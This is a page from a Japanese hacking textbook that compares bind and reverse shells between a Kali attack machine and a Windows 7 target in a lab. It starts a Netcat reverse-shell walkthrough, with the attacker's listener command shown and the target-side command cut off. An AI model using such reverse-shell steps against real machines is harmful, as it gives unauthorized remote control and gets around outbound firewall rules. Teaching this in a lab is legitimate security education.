
236
第2部 ハッキングを体験する
イアウォールやルーターはアウトバウンド(内部から外部へのアクセス)がゆる
く、リバースシェルの通信はブロックされないことが多いといえます。
Kali
(攻撃端末)
Windows 7
(ターゲット端末)
10.0.0.210.0.0.102
①Netcatで待ち受け
状態になっています。
port:5555
②ターゲット端末に
アクセスします。
(ブロックされやすい)
③コマンドプロンプト
(Windows 7のシェル)
が表示されます。
Kali
(攻撃端末)
Windows 7
(ターゲット端末)
③コマンドプロンプト
(Windows 7のシェル)
が表示されます。
port:5555
②ターゲット端末から
アクセスします。
(ブロックされにくい)
①Netcatで待ち受け
状態になっています。
リバースシェルの場合
バインドシェルの場合
図4-14 バインドシェルとリバースシェルの比較
● Netcatによるリバースシェル
Netcatでリバースシェルを実現する方法を紹介します。
①ポート番号を指定する
Kali(攻撃端末)で、次のようにポート番号を指定して、接続を待ち受けます。
バインドシェルとは違い、攻撃端末が待ち受けています。
root@kali:~# nc -lvp 5555
listening on [any] 5555 ...
②Windows 7を遠隔操作する
Windows 7(ターゲット端末)で、次のコマンドを実行します。
C:¥Work¥nc111nt>nc.exe ...